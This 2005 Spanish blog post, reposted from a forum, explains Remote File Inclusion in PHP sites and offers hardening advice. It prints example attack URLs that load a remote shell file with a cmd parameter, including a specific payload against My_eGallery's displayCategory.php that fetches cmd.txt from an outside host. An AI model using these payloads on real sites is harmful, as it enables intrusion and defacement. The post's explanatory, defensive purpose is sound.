domingo, septiembre 25, 2005

RFI (Remote File Inclusion). Me hackearon la web...

Articulo capturado de un Hacker foro http://www.desarrollonuke.org/forosbb-postp15464.html

Este metodo se basa en utilizar los malos includes en archivos.

Cuando uno hace un include, lo hace refieriendolo a un archivo desntro del sitio ke puede estar o no dentro de carpetas.

Si uno hace mal el include o utiliza mal las variables en los includes, por ejemplo include($lalala/archivo.php) genera que se haga una brecha en la seguridad del archivo.

Entonces la url quedaria asi: http://we.com/archivo.php?archivo=lalala esta seria la original. Al ser hackeada (mejor denominado defaceada) quedaria asi: http://web.com/archivo.php?archivo=http://hack.com

Eso lo que haria es cargar la web hack.com donde va el include. Pero eso no genera gran cosa ya ke solo lo veria el atacante.

La cuestion es que el atacante usa una shell para defacear la web, ke la guarda en su sitio como cdm.txt o cmd.gif o como kiera, sin ke sea php porke sino se le ejecuta en su sito.

Entonces el atacante ejecuta esa shell en tu sitio de la siguiente manera: http://web.com/archivo.php?archivo=http://hack.com/cmd.txt?cmd=[codigo unix ke kiera ejecutar en tu web]

Con esto supongo que se ira entendiendo un poco el proceso con el cual hackearon sus webs.

Todos hablan de ke el my_egallery es vulnerable y ke esto y lo otro, pero no explican porke

El archivo displayCategory.php al inicio hace dos includes (si no me ekivoco) ke son algo asi: include('$basepath'/lala.php) entonces en la url se puede falsificar esa variable por la ke el atacante kiera:

/modules/My_eGallery/public/displayCategory.php?basepath=http://badboybm.100free.com/cmd.txt?&cmd=id

Ahi tienen el claro ejemplo de cuando los atacaron a ustedes.

Como se abran dado cuenta, la solucion a ese problema es reemplazar $basepath por los datos ke corresponden ahi, que si mal no recuerdo se definen en el config.

Ese es el problema por el cual la mayoria de los sistemas free son atacados: Primero porque el codigo es libre y todos lo ven Segundo ke usan muchas variables ya ke tienen ke tratar de ser compatible con muchas cosas, asi como tambien de las carpetas donde se pongan los sistemas etc etc etc.

Como veran hay hackers y hackers.

Les doy un consejo, cada ves ke pongan un script o un sistema es sus webs, antes de subirlo bajanse todos los parches, entren en advisories como http://www.securityfocus.com/ y fijense los fallos y como se explotan en los scripts ke bajaron. Pero mas ke nada, abran todos los archivos, y editenlos para ke sean unicamente para su web, reemplazando las variables por los datos originales, etc etc etc.

Ya que la mayoria de los que hacen defaces son script kiddies, que lo que hacen es usar codigos ya escritos para hackear webs, y si el script no les funciona pasan de sitio, ya que no saben pasar las adversidades :p